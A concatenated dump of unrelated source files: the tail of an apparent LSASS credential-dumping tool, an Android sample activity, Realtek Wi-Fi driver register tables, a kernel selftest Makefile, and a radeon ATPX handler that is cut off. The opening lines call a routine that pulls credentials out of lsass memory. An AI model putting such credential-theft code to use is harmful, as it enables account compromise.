printf("[x] Error: Could not find keys in lsass\n");
return 1;
}
}
// With keys extracted, we can extract credentials from memory
if (FindCredentials(hLsass, wdigest) != 0) {
printf("[x] Error: Could not find credentials in lsass\n");
return 1;
}
}
| kartikdurg/Enum-LSASS |
<|start_filename|>sample-app/src/main/java/com/dicedmelon/example/android/MainActivity.java<|end_filename|>
package com.dicedmelon.example.android;
import androidx.databinding.DataBindingUtil;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;
import com.dicedmelon.example.android.databinding.ActivityMainBinding;
public class MainActivity extends AppCompatActivity {
@Override protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
ActivityMainBinding viewDataBinding =
DataBindingUtil.setContentView(this, R.layout.activity_main);
NumberProvider numberProvider = new NumberProvider();
viewDataBinding.setNumber(numberProvider.provideNumber());
}
}
| tzltdc/example-android |
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723be/table.c<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* Created on 2010/ 5/18, 1:41
*
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#include "table.h"
u32 RTL8723BEPHY_REG_1TARRAY[] = {
0x800, 0x80040000,
0x804, 0x00000003,
0x808, 0x0000FC00,
0x80C, 0x0000000A,
0x810, 0x10001331,
0x814, 0x020C3D10,
0x818, 0x02200385,
0x81C, 0x00000000,
0x820, 0x01000100,
0x824, 0x00390204,
0x828, 0x00000000,
0x82C, 0x00000000,
0x830, 0x00000000,
0x834, 0x00000000,
0x838, 0x00000000,
0x83C, 0x00000000,
0x840, 0x00010000,
0x844, 0x00000000,
0x848, 0x00000000,
0x84C, 0x00000000,
0x850, 0x00000000,
0x854, 0x00000000,
0x858, 0x569A11A9,
0x85C, 0x01000014,
0x860, 0x66F60110,
0x864, 0x061F0649,
0x868, 0x00000000,
0x86C, 0x27272700,
0x870, 0x07000760,
0x874, 0x25004000,
0x878, 0x00000808,
0x87C, 0x00000000,
0x880, 0xB0000C1C,
0x884, 0x00000001,
0x888, 0x00000000,
0x88C, 0xCCC000C0,
0x890, 0x00000800,
0x894, 0xFFFFFFFE,
0x898, 0x40302010,
0x89C, 0x00706050,
0x900, 0x00000000,
0x904, 0x00000023,
0x908, 0x00000000,
0x90C, 0x81121111,
0x910, 0x00000002,
0x914, 0x00000201,
0x948, 0x00000000,
0xA00, 0x00D047C8,
0xA04, 0x80FF000C,
0xA08, 0x8C838300,
0xA0C, 0x2E7F120F,
0xA10, 0x9500BB78,
0xA14, 0x1114D028,
0xA18, 0x00881117,
0xA1C, 0x89140F00,
0xA20, 0x1A1B0000,
0xA24, 0x090E1317,
0xA28, 0x00000204,
0xA2C, 0x00D30000,
0xA70, 0x101FBF00,
0xA74, 0x00000007,
0xA78, 0x00000900,
0xA7C, 0x225B0606,
0xA80, 0x21806490,
0xB2C, 0x00000000,
0xC00, 0x48071D40,
0xC04, 0x03A05611,
0xC08, 0x000000E4,
0xC0C, 0x6C6C6C6C,
0xC10, 0x08800000,
0xC14, 0x40000100,
0xC18, 0x08800000,
0xC1C, 0x40000100,
0xC20, 0x00000000,
0xC24, 0x00000000,
0xC28, 0x00000000,
0xC2C, 0x00000000,
0xC30, 0x69E9AC44,
0xC34, 0x469652AF,
0xC38, 0x49795994,
0xC3C, 0x0A97971C,
0xC40, 0x1F7C403F,
0xC44, 0x000100B7,
0xC48, 0xEC020107,
0xC4C, 0x007F037F,
0xC50, 0x69553420,
0xC54, 0x43BC0094,
0xC58, 0x00023169,
0xC5C, 0x00250492,
0xC60, 0x00000000,
0xC64, 0x7112848B,
0xC68, 0x47C00BFF,
0xC6C, 0x00000036,
0xC70, 0x2C7F000D,
0xC74, 0x020610DB,
0xC78, 0x0000001F,
0xC7C, 0x00B91612,
0xC80, 0x390000E4,
0xC84, 0x20F60000,
0xC88, 0x40000100,
0xC8C, 0x20200000,
0xC90, 0x00020E1A,
0xC94, 0x00000000,
0xC98, 0x00020E1A,
0xC9C, 0x00007F7F,
0xCA0, 0x00000000,
0xCA4, 0x000300A0,
0xCA8, 0x00000000,
0xCAC, 0x00000000,
0xCB0, 0x00000000,
0xCB4, 0x00000000,
0xCB8, 0x00000000,
0xCBC, 0x28000000,
0xCC0, 0x00000000,
0xCC4, 0x00000000,
0xCC8, 0x00000000,
0xCCC, 0x00000000,
0xCD0, 0x00000000,
0xCD4, 0x00000000,
0xCD8, 0x64B22427,
0xCDC, 0x00766932,
0xCE0, 0x00222222,
0xCE4, 0x00000000,
0xCE8, 0x37644302,
0xCEC, 0x2F97D40C,
0xD00, 0x00000740,
0xD04, 0x40020401,
0xD08, 0x0000907F,
0xD0C, 0x20010201,
0xD10, 0xA0633333,
0xD14, 0x3333BC53,
0xD18, 0x7A8F5B6F,
0xD2C, 0xCC979975,
0xD30, 0x00000000,
0xD34, 0x80608000,
0xD38, 0x00000000,
0xD3C, 0x00127353,
0xD40, 0x00000000,
0xD44, 0x00000000,
0xD48, 0x00000000,
0xD4C, 0x00000000,
0xD50, 0x6437140A,
0xD54, 0x00000000,
0xD58, 0x00000282,
0xD5C, 0x30032064,
0xD60, 0x4653DE68,
0xD64, 0x04518A3C,
0xD68, 0x00002101,
0xD6C, 0x2A201C16,
0xD70, 0x1812362E,
0xD74, 0x322C2220,
0xD78, 0x000E3C24,
0xE00, 0x2D2D2D2D,
0xE04, 0x2D2D2D2D,
0xE08, 0x0390272D,
0xE10, 0x2D2D2D2D,
0xE14, 0x2D2D2D2D,
0xE18, 0x2D2D2D2D,
0xE1C, 0x2D2D2D2D,
0xE28, 0x00000000,
0xE30, 0x1000DC1F,
0xE34, 0x10008C1F,
0xE38, 0x02140102,
0xE3C, 0x681604C2,
0xE40, 0x01007C00,
0xE44, 0x01004800,
0xE48, 0xFB000000,
0xE4C, 0x000028D1,
0xE50, 0x1000DC1F,
0xE54, 0x10008C1F,
0xE58, 0x02140102,
0xE5C, 0x28160D05,
0xE60, 0x00000008,
0xE68, 0x001B2556,
0xE6C, 0x00C00096,
0xE70, 0x00C00096,
0xE74, 0x01000056,
0xE78, 0x01000014,
0xE7C, 0x01000056,
0xE80, 0x01000014,
0xE84, 0x00C00096,
0xE88, 0x01000056,
0xE8C, 0x00C00096,
0xED0, 0x00C00096,
0xED4, 0x00C00096,
0xED8, 0x00C00096,
0xEDC, 0x000000D6,
0xEE0, 0x000000D6,
0xEEC, 0x01C00016,
0xF14, 0x00000003,
0xF4C, 0x00000000,
0xF00, 0x00000300,
0x820, 0x01000100,
0x800, 0x83040000,
};
u32 RTL8723BEPHY_REG_ARRAY_PG[] = {
0, 0, 0, 0x00000e08, 0x0000ff00, 0x00004000,
0, 0, 0, 0x0000086c, 0xffffff00, 0x34363800,
0, 0, 0, 0x00000e00, 0xffffffff, 0x42444646,
0, 0, 0, 0x00000e04, 0xffffffff, 0x30343840,
0, 0, 0, 0x00000e10, 0xffffffff, 0x38404244,
0, 0, 0, 0x00000e14, 0xffffffff, 0x26303436
};
u32 RTL8723BE_RADIOA_1TARRAY[] = {
0x000, 0x00010000,
0x0B0, 0x000DFFE0,
0x0FE, 0x00000000,
0x0FE, 0x00000000,
0x0FE, 0x00000000,
0x0B1, 0x00000018,
0x0FE, 0x00000000,
0x0FE, 0x00000000,
0x0FE, 0x00000000,
0x0B2, 0x00084C00,
0x0B5, 0x0000D2CC,
0x0B6, 0x000925AA,
0x0B7, 0x00000010,
0x0B8, 0x0000907F,
0x05C, 0x00000002,
0x07C, 0x00000002,
0x07E, 0x00000005,
0x08B, 0x0006FC00,
0x0B0, 0x000FF9F0,
0x01C, 0x000739D2,
0x01E, 0x00000000,
0x0DF, 0x00000780,
0x050, 0x00067435,
0x051, 0x0006B04E,
0x052, 0x000007D2,
0x053, 0x00000000,
0x054, 0x00050400,
0x055, 0x0004026E,
0x0DD, 0x0000004C,
0x070, 0x00067435,
0x071, 0x0006B04E,
0x072, 0x000007D2,
0x073, 0x00000000,
0x074, 0x00050400,
0x075, 0x0004026E,
0x0EF, 0x00000100,
0x034, 0x0000ADD7,
0x035, 0x00005C00,
0x034, 0x00009DD4,
0x035, 0x00005000,
0x034, 0x00008DD1,
0x035, 0x00004400,
0x034, 0x00007DCE,
0x035, 0x00003800,
0x034, 0x00006CD1,
0x035, 0x00004400,
0x034, 0x00005CCE,
0x035, 0x00003800,
0x034, 0x000048CE,
0x035, 0x00004400,
0x034, 0x000034CE,
0x035, 0x00003800,
0x034, 0x00002451,
0x035, 0x00004400,
0x034, 0x0000144E,
0x035, 0x00003800,
0x034, 0x00000051,
0x035, 0x00004400,
0x0EF, 0x00000000,
0x0EF, 0x00000100,
0x0ED, 0x00000010,
0x044, 0x0000ADD7,
0x044, 0x00009DD4,
0x044, 0x00008DD1,
0x044, 0x00007DCE,
0x044, 0x00006CC1,
0x044, 0x00005CCE,
0x044, 0x000044D1,
0x044, 0x000034CE,
0x044, 0x00002451,
0x044, 0x0000144E,
0x044, 0x00000051,
0x0EF, 0x00000000,
0x0ED, 0x00000000,
0x0EF, 0x00002000,
0x03B, 0x000380EF,
0x03B, 0x000302FE,
0x03B, 0x00028CE6,
0x03B, 0x000200BC,
0x03B, 0x000188A5,
0x03B, 0x00010FBC,
0x03B, 0x00008F71,
0x03B, 0x00000900,
0x0EF, 0x00000000,
0x0ED, 0x00000001,
0x040, 0x000380EF,
0x040, 0x000302FE,
0x040, 0x00028CE6,
0x040, 0x000200BC,
0x040, 0x000188A5,
0x040, 0x00010FBC,
0x040, 0x00008F71,
0x040, 0x00000900,
0x0ED, 0x00000000,
0x082, 0x00080000,
0x083, 0x00008000,
0x084, 0x00048D80,
0x085, 0x00068000,
0x0A2, 0x00080000,
0x0A3, 0x00008000,
0x0A4, 0x00048D80,
0x0A5, 0x00068000,
0x000, 0x00033D80,
};
u32 RTL8723BEMAC_1T_ARRAY[] = {
0x02F, 0x00000030,
0x035, 0x00000000,
0x428, 0x0000000A,
0x429, 0x00000010,
0x430, 0x00000000,
0x431, 0x00000000,
0x432, 0x00000000,
0x433, 0x00000001,
0x434, 0x00000004,
0x435, 0x00000005,
0x436, 0x00000007,
0x437, 0x00000008,
0x43C, 0x00000004,
0x43D, 0x00000005,
0x43E, 0x00000007,
0x43F, 0x00000008,
0x440, 0x0000005D,
0x441, 0x00000001,
0x442, 0x00000000,
0x444, 0x00000010,
0x445, 0x00000000,
0x446, 0x00000000,
0x447, 0x00000000,
0x448, 0x00000000,
0x449, 0x000000F0,
0x44A, 0x0000000F,
0x44B, 0x0000003E,
0x44C, 0x00000010,
0x44D, 0x00000000,
0x44E, 0x00000000,
0x44F, 0x00000000,
0x450, 0x00000000,
0x451, 0x000000F0,
0x452, 0x0000000F,
0x453, 0x00000000,
0x456, 0x0000005E,
0x460, 0x00000066,
0x461, 0x00000066,
0x4C8, 0x000000FF,
0x4C9, 0x00000008,
0x4CC, 0x000000FF,
0x4CD, 0x000000FF,
0x4CE, 0x00000001,
0x500, 0x00000026,
0x501, 0x000000A2,
0x502, 0x0000002F,
0x503, 0x00000000,
0x504, 0x00000028,
0x505, 0x000000A3,
0x506, 0x0000005E,
0x507, 0x00000000,
0x508, 0x0000002B,
0x509, 0x000000A4,
0x50A, 0x0000005E,
0x50B, 0x00000000,
0x50C, 0x0000004F,
0x50D, 0x000000A4,
0x50E, 0x00000000,
0x50F, 0x00000000,
0x512, 0x0000001C,
0x514, 0x0000000A,
0x516, 0x0000000A,
0x525, 0x0000004F,
0x550, 0x00000010,
0x551, 0x00000010,
0x559, 0x00000002,
0x55C, 0x00000050,
0x55D, 0x000000FF,
0x605, 0x00000030,
0x608, 0x0000000E,
0x609, 0x0000002A,
0x620, 0x000000FF,
0x621, 0x000000FF,
0x622, 0x000000FF,
0x623, 0x000000FF,
0x624, 0x000000FF,
0x625, 0x000000FF,
0x626, 0x000000FF,
0x627, 0x000000FF,
0x638, 0x00000050,
0x63C, 0x0000000A,
0x63D, 0x0000000A,
0x63E, 0x0000000E,
0x63F, 0x0000000E,
0x640, 0x00000040,
0x642, 0x00000040,
0x643, 0x00000000,
0x652, 0x000000C8,
0x66E, 0x00000005,
0x700, 0x00000021,
0x701, 0x00000043,
0x702, 0x00000065,
0x703, 0x00000087,
0x708, 0x00000021,
0x709, 0x00000043,
0x70A, 0x00000065,
0x70B, 0x00000087,
};
u32 RTL8723BEAGCTAB_1TARRAY[] = {
0xC78, 0xFD000001,
0xC78, 0xFC010001,
0xC78, 0xFB020001,
0xC78, 0xFA030001,
0xC78, 0xF9040001,
0xC78, 0xF8050001,
0xC78, 0xF7060001,
0xC78, 0xF6070001,
0xC78, 0xF5080001,
0xC78, 0xF4090001,
0xC78, 0xF30A0001,
0xC78, 0xF20B0001,
0xC78, 0xF10C0001,
0xC78, 0xF00D0001,
0xC78, 0xEF0E0001,
0xC78, 0xEE0F0001,
0xC78, 0xED100001,
0xC78, 0xEC110001,
0xC78, 0xEB120001,
0xC78, 0xEA130001,
0xC78, 0xE9140001,
0xC78, 0xE8150001,
0xC78, 0xE7160001,
0xC78, 0xAA170001,
0xC78, 0xA9180001,
0xC78, 0xA8190001,
0xC78, 0xA71A0001,
0xC78, 0xA61B0001,
0xC78, 0xA51C0001,
0xC78, 0xA41D0001,
0xC78, 0xA31E0001,
0xC78, 0x671F0001,
0xC78, 0x66200001,
0xC78, 0x65210001,
0xC78, 0x64220001,
0xC78, 0x63230001,
0xC78, 0x62240001,
0xC78, 0x61250001,
0xC78, 0x47260001,
0xC78, 0x46270001,
0xC78, 0x45280001,
0xC78, 0x44290001,
0xC78, 0x432A0001,
0xC78, 0x422B0001,
0xC78, 0x292C0001,
0xC78, 0x282D0001,
0xC78, 0x272E0001,
0xC78, 0x262F0001,
0xC78, 0x25300001,
0xC78, 0x24310001,
0xC78, 0x09320001,
0xC78, 0x08330001,
0xC78, 0x07340001,
0xC78, 0x06350001,
0xC78, 0x05360001,
0xC78, 0x04370001,
0xC78, 0x03380001,
0xC78, 0x02390001,
0xC78, 0x013A0001,
0xC78, 0x003B0001,
0xC78, 0x003C0001,
0xC78, 0x003D0001,
0xC78, 0x003E0001,
0xC78, 0x003F0001,
0xC78, 0xFC400001,
0xC78, 0xFB410001,
0xC78, 0xFA420001,
0xC78, 0xF9430001,
0xC78, 0xF8440001,
0xC78, 0xF7450001,
0xC78, 0xF6460001,
0xC78, 0xF5470001,
0xC78, 0xF4480001,
0xC78, 0xF3490001,
0xC78, 0xF24A0001,
0xC78, 0xF14B0001,
0xC78, 0xF04C0001,
0xC78, 0xEF4D0001,
0xC78, 0xEE4E0001,
0xC78, 0xED4F0001,
0xC78, 0xEC500001,
0xC78, 0xEB510001,
0xC78, 0xEA520001,
0xC78, 0xE9530001,
0xC78, 0xE8540001,
0xC78, 0xE7550001,
0xC78, 0xE6560001,
0xC78, 0xE5570001,
0xC78, 0xAA580001,
0xC78, 0xA9590001,
0xC78, 0xA85A0001,
0xC78, 0xA75B0001,
0xC78, 0xA65C0001,
0xC78, 0xA55D0001,
0xC78, 0xA45E0001,
0xC78, 0x675F0001,
0xC78, 0x66600001,
0xC78, 0x65610001,
0xC78, 0x64620001,
0xC78, 0x63630001,
0xC78, 0x62640001,
0xC78, 0x61650001,
0xC78, 0x47660001,
0xC78, 0x46670001,
0xC78, 0x45680001,
0xC78, 0x44690001,
0xC78, 0x436A0001,
0xC78, 0x426B0001,
0xC78, 0x296C0001,
0xC78, 0x286D0001,
0xC78, 0x276E0001,
0xC78, 0x266F0001,
0xC78, 0x25700001,
0xC78, 0x24710001,
0xC78, 0x09720001,
0xC78, 0x08730001,
0xC78, 0x07740001,
0xC78, 0x06750001,
0xC78, 0x05760001,
0xC78, 0x04770001,
0xC78, 0x03780001,
0xC78, 0x02790001,
0xC78, 0x017A0001,
0xC78, 0x007B0001,
0xC78, 0x007C0001,
0xC78, 0x007D0001,
0xC78, 0x007E0001,
0xC78, 0x007F0001,
0xC50, 0x69553422,
0xC50, 0x69553420,
};
<|start_filename|>linux-3.16/tools/testing/selftests/cpu-hotplug/Makefile<|end_filename|>
all:
run_tests:
@/bin/bash ./on-off-test.sh || echo "cpu-hotplug selftests: [FAIL]"
clean:
<|start_filename|>linux-3.16/drivers/gpu/drm/radeon/radeon_atpx_handler.c<|end_filename|>
/*
* Copyright (c) 2010 Red Hat Inc.
* Author : <NAME> <<EMAIL>>
*
* Licensed under GPLv2
*
* ATPX support for both Intel/ATI
*/
#include <linux/vga_switcheroo.h>
#include <linux/slab.h>
#include <linux/acpi.h>
#include <linux/pci.h>
#include "radeon_acpi.h"
struct radeon_atpx_functions {
bool px_params;
bool power_cntl;
bool disp_mux_cntl;
bool i2c_mux_cntl;
bool switch_start;
bool switch_end;
bool disp_connectors_mapping;
bool disp_detetion_ports;
};
struct radeon_atpx {
acpi_handle handle;
struct radeon_atpx_functions functions;
};
static struct radeon_atpx_priv {
bool atpx_detected;
/* handle for device - and atpx */
acpi_handle dhandle;
acpi_handle other_handle;
struct radeon_atpx atpx;
} radeon_atpx_priv;
struct atpx_verify_interface {
u16 size; /* structure size in bytes (includes size field) */
u16 version; /* version */
u32 function_bits; /* supported functions bit vector */
} __packed;
struct atpx_px_params {
u16 size; /* structure size in bytes (includes size field) */
u32 valid_flags; /* which flags are valid */
u32 flags; /* flags */
} __packed;
struct atpx_power_control {
u16 size;
u8 dgpu_state;
} __packed;
struct atpx_mux {
u16 size;
u16 mux;
} __packed;
bool radeon_has_atpx(void) {
return radeon_atpx_priv.atpx_detected;
}
/**
* radeon_atpx_call - call an ATPX method
*
* @handle: acpi handle
* @function: the ATPX function to execute
* @params: ATPX function params
*
* Executes the requested ATPX function (all asics).
* Returns a pointer to the acpi output buffer.
*/
static union acpi_object *radeon_atpx_call(acpi_handle handle, int function,
struct acpi_buffer *params)
{
acpi_status status;
union acpi_object atpx_arg_elements[2];
struct acpi_object_list atpx_arg;
struct acpi_buffer buffer = { ACPI_ALLOCATE_BUFFER, NULL };
atpx_arg.count = 2;
atpx_arg.pointer = &atpx_arg_elements[0];
atpx_arg_elements[0].type = ACPI_TYPE_INTEGER;
atpx_arg_elements[0].integer.value = function;
if (params) {
atpx_arg_elements[1].type = ACPI_TYPE_BUFFER;
atpx_arg_elements[1].buffer.length = params->length;
atpx_arg_elements[1].buffer.pointer = params->pointer;
} else {
/* We need a second fake parameter */
atpx_arg_elements[1].type = ACPI_TYPE_INTEGER;
atpx_arg_elements[1].integer.value = 0;
}
status = acpi_evaluate_object(handle, NULL, &atpx_arg, &buffer);
/* Fail only if calling the method fails and ATPX is supported */
if (ACPI_FAILURE(status) && status != AE_NOT_FOUND) {
printk("failed to evaluate ATPX got %s\n",
acpi_format_exception(status));
kfree(buffer.pointer);
return NULL;
}
return buffer.pointer;
}
/**
* radeon_atpx_parse_functions - parse supported functions
*
* @f: supported functions struct
* @mask: supported functions mask from ATPX
*
* Use the supported functions mask from ATPX function
* ATPX_FUNCTION_VERIFY_INTERFACE to determine what functions
* are supported (all asics).
*/
static void radeon_atpx_parse_functions(struct radeon_atpx_functions *f, u32 mask)
{
f->px_params = mask & ATPX_GET_PX_PARAMETERS_SUPPORTED;
f->power_cntl = mask & ATPX_POWER_CONTROL_SUPPORTED;
f->disp_mux_cntl = mask & ATPX_DISPLAY_MUX_CONTROL_SUPPORTED;
f->i2c_mux_cntl = mask & ATPX_I2C_MUX_CONTROL_SUPPORTED;
f->switch_start = mask & ATPX_GRAPHICS_DEVICE_SWITCH_START_NOTIFICATION_SUPPORTED;
f->switch_end = mask & ATPX_GRAPHICS_DEVICE_SWITCH_END_NOTIFICATION_SUPPORTED;
f->disp_connectors_mapping = mask & ATPX_GET_DISPLAY_CONNECTORS_MAPPING_SUPPORTED;
f->disp_detetion_ports = mask & ATPX_GET_DISPLAY_DETECTION_PORTS_SUPPORTED;
}
/**
* radeon_atpx_validate_functions - validate ATPX functions
*
* @atpx: radeon atpx struct
*
* Validate that required functions are enabled (all asics).
* returns 0 on success, error on failure.
*/
static int radeon_atpx_validate(struct radeon_atpx *atpx)
{
/* make sure required functions are enabled */
/* dGPU power control is required */
atpx->functions.power_cntl = true;
if (atpx->functions.px_params) {
union acpi_object *info;
struct atpx_px_params output;
size_t size;
u32 valid_bits;
info = radeon_atpx_call(atpx->handle, ATPX_FUNCTION_GET_PX_PARAMETERS, NULL);
if (!info)
return -EIO;
memset(&output, 0, sizeof(output));
size = *(u16 *) info->buffer.pointer;
if (size < 10) {
printk("ATPX buffer is too small: %zu\n", size);
kfree(info);
return -EINVAL;
}
size = min(sizeof(output), size);
memcpy(&output, info->buffer.pointer, size);
valid_bits = output.flags & output.valid_flags;
/* if separate mux flag is set, mux controls are required */
if (valid_bits & ATPX_SEPARATE_MUX_FOR_I2C) {
atpx->functions.i2c_mux_cntl = true;
atpx->functions.disp_mux_cntl = true;
}
/* if any outputs are muxed, mux controls are required */
if (valid_bits & (ATPX_CRT1_RGB_SIGNAL_MUXED |
ATPX_TV_SIGNAL_MUXED |
ATPX_DFP_SIGNAL_MUXED))
atpx->functions.disp_mux_cntl = true;
kfree(info);
}
return 0;
}
/**
* radeon_atpx_verify_interface - verify ATPX
*
* @atpx: radeon atpx struct
*
* Execute the ATPX_FUNCTION_VERIFY_INTERFACE ATPX function
* to initialize ATPX and determine what features are supported
* (all asics).
* returns 0 on success, error on failure.
*/
static int radeon_atpx_verify_interface(struct radeon_atpx *atpx)
{
union acpi_object *info;
struct atpx_verify_interface output;
size_t size;
int err = 0;
info = radeon_atpx_call(atpx->handle, ATPX_FUNCTION_VERIFY_INTERFACE, NULL);
if (!info)
return -EIO;
memset(&output, 0, sizeof(output));
size = *(u16 *) info->buffer.pointer;
if (size < 8) {
printk("ATPX buffer is too small: %zu\n", size);
err = -EINVAL;
goto out;
}
size = min(sizeof(output), size);
memcpy(&output, info->buffer.pointer, size);
/* TODO: check version? */
printk("ATPX version %u, functions 0x%08x\n",
output.version, output.function_bits);
radeon_atpx_parse_functions(&atpx->functions, output.function_bits);
out:
kfree(info);
return err;
}
/**
* radeon_atpx_set_discrete_state - power up/down discrete GPU
*
* @atpx: atpx info struct
* @state: discrete GPU state (0 = power down, 1 = power up)
*
* Execute the ATPX_FUNCTION_POWER_CONTROL ATPX function to
* power down/up the discrete GPU (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_set_discrete_state(struct radeon_atpx *atpx, u8 state)
{
struct acpi_buffer params;
union acpi_object *info;
struct atpx_power_control input;
if (atpx->functions.power_cntl) {
input.size = 3;
input.dgpu_state = state;
params.length = input.size;
params.pointer = &input;
info = radeon_atpx_call(atpx->handle,
ATPX_FUNCTION_POWER_CONTROL,
¶ms);
if (!info)
return -EIO;
kfree(info);
}
return 0;
}
/**
* radeon_atpx_switch_disp_mux - switch display mux
*
* @atpx: atpx info struct
* @mux_id: mux state (0 = integrated GPU, 1 = discrete GPU)
*
* Execute the ATPX_FUNCTION_DISPLAY_MUX_CONTROL ATPX function to
* switch the display mux between the discrete GPU and integrated GPU
* (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_switch_disp_mux(struct radeon_atpx *atpx, u16 mux_id)
{
struct acpi_buffer params;
union acpi_object *info;
struct atpx_mux input;
if (atpx->functions.disp_mux_cntl) {
input.size = 4;
input.mux = mux_id;
params.length = input.size;
params.pointer = &input;
info = radeon_atpx_call(atpx->handle,
ATPX_FUNCTION_DISPLAY_MUX_CONTROL,
¶ms);
if (!info)
return -EIO;
kfree(info);
}
return 0;
}
/**
* radeon_atpx_switch_i2c_mux - switch i2c/hpd mux
*
* @atpx: atpx info struct
* @mux_id: mux state (0 = integrated GPU, 1 = discrete GPU)
*
* Execute the ATPX_FUNCTION_I2C_MUX_CONTROL ATPX function to
* switch the i2c/hpd mux between the discrete GPU and integrated GPU
* (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_switch_i2c_mux(struct radeon_atpx *atpx, u16 mux_id)
{
struct acpi_buffer params;
union acpi_object *info;
struct atpx_mux input;
if (atpx->functions.i2c_mux_cntl) {
input.size = 4;
input.mux = mux_id;
params.length = input.size;
params.pointer = &input;
info = radeon_atpx_call(atpx->handle,
ATPX_FUNCTION_I2C_MUX_CONTROL,
¶ms);
if (!info)
return -EIO;
kfree(info);
}
return 0;
}
/**
* radeon_atpx_switch_start - notify the sbios of a GPU switch
*
* @atpx: atpx info struct
* @mux_id: mux state (0 = integrated GPU, 1 = discrete GPU)
*
* Execute the ATPX_FUNCTION_GRAPHICS_DEVICE_SWITCH_START_NOTIFICATION ATPX
* function to notify the sbios that a switch between the discrete GPU and
* integrated GPU has begun (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_switch_start(struct radeon_atpx *atpx, u16 mux_id)
{
struct acpi_buffer params;
union acpi_object *info;
struct atpx_mux input;
if (atpx->functions.switch_start) {
input.size = 4;
input.mux = mux_id;
params.length = input.size;
params.pointer = &input;
info = radeon_atpx_call(atpx->handle,
ATPX_FUNCTION_GRAPHICS_DEVICE_SWITCH_START_NOTIFICATION,
¶ms);
if (!info)
return -EIO;
kfree(info);
}
return 0;
}
/**
* radeon_atpx_switch_end - notify the sbios of a GPU switch
*
* @atpx: atpx info struct
* @mux_id: mux state (0 = integrated GPU, 1 = discrete GPU)
*
* Execute the ATPX_FUNCTION_GRAPHICS_DEVICE_SWITCH_END_NOTIFICATION ATPX
* function to notify the sbios that a switch between the discrete GPU and
* integrated GPU has ended (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_switch_end(struct radeon_atpx *atpx, u16 mux_id)
{
struct acpi_buffer params;
union acpi_object *info;
struct atpx_mux input;
if (atpx->functions.switch_end) {
input.size = 4;
input.mux = mux_id;
params.length = input.size;
params.pointer = &input;
info = radeon_atpx_call(atpx->handle,
ATPX_FUNCTION_GRAPHICS_DEVICE_SWITCH_END_NOTIFICATION,
¶ms);
if (!info)
return -EIO;
kfree(info);
}
return 0;
}
/**
* radeon_atpx_switchto - switch to the requested GPU
*
* @id: GPU to switch to
*
* Execute the necessary ATPX functions to switch between the discrete GPU and
* integrated GPU (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_switchto(enum vga_switcheroo_client_id id)
{
u16 gpu_id;
if (id == VGA_SWITCHEROO_IGD)
gpu_id = ATPX_INTEGRATED_GPU;
else
gpu_id = ATPX_DISCRETE_GPU;
radeon_atpx_switch_start(&radeon_atpx_priv.atpx, gpu_id);
radeon_atpx_switch_disp_mux(&radeon_atpx_priv.atpx, gpu_id);
radeon_atpx_switch_i2c_mux(&radeon_atpx_priv.atpx, gpu_id);
radeon_atpx_switch_end(&radeon_atpx_priv.atpx, gpu_id);
return 0;
}
/**
* radeon_atpx_power_state - power down/up the requested GPU
*
* @id: GPU to power down/up
* @state: requested power state (0 = off, 1 = on)
*
* Execute the necessary ATPX function to power down/up the discrete GPU
* (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_power_state(enum vga_switcheroo_client_id id,
enum vga_switcheroo_state state)
{
/* on w500 ACPI can't change intel gpu state */
if (id == VGA_SWITCHEROO_IGD)
return 0;
radeon_atpx_set_discrete_state(&radeon_atpx_priv.atpx, state);
return 0;
}
/**
* radeon_atpx_pci_probe_handle - look up the ATPX handle
*
* @pdev: pci device
*
* Look up the ATPX handles (all asics).
* Returns true if the handles are found, false if not.
*/
static bool radeon_atpx_pci_probe_handle(struct pci_dev *pdev)
{
acpi_handle dhandle, atpx_handle;
acpi_status status;
dhandle = ACPI_HANDLE(&pdev->dev);
if (!dhandle)
return false;
status = acpi_get_handle(dhandle, "ATPX", &atpx_handle);
if (ACPI_FAILURE(status)) {
radeon_atpx_priv.other_handle = dhandle;
return false;
}
radeon_atpx_priv.dhandle = dhandle;
radeon_atpx_priv.atpx.handle = atpx_handle;
return true;
}
/**
* radeon_atpx_init - verify the ATPX interface
*
* Verify the ATPX interface (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_init(void)
{
int r;
/* set up the ATPX handle */
r = radeon_atpx_verify_interface(&radeon_atpx_priv.atpx);
if (r)
return r;
/* validate the atpx setup */
r = radeon_atpx_validate(&radeon_atpx_priv.atpx);
if (r)
return r;
return 0;
}
/**
* radeon_atpx_get_client_id - get the client id
*
* @pdev: pci device
*
* look up whether we are the integrated or discrete GPU (all asics).
* Returns the client id.
*/
static int radeon_atpx_get_client_id(struct pci_dev *pdev)
{
if (radeon_atpx_priv.dhandle == ACPI_HANDLE(&pdev->dev))
return VGA_SWITCHEROO_IGD;
else
return VGA_SWITCHEROO_DIS;
}
static struct vga_switcheroo_handler radeon_atpx_handler = {
.switchto = radeon_atpx_switchto,
.power_state = radeon_atpx_power_state,
.init = radeon_atpx_init,
.get_client_id = radeon_atpx_get_client_id,
};
/**
* radeon_atpx_detect - detect whether we have PX
*
* Check if we have a PX system (all asics).
* Returns true if we have a PX system, false if not.
*/
static bool radeon_atpx_detect(void)
{
char acpi_method_name[255] = { 0 };
struct acpi_buffer buffer = {sizeof(acpi_method_name), acpi_method_name};
struct pci_dev *pdev = NULL;
bool has_atpx = false;
int vga_count = 0;
while ((pdev = pci_get_class(PCI_CLASS_DISPLAY_VGA << 8, pdev)) != NULL) {
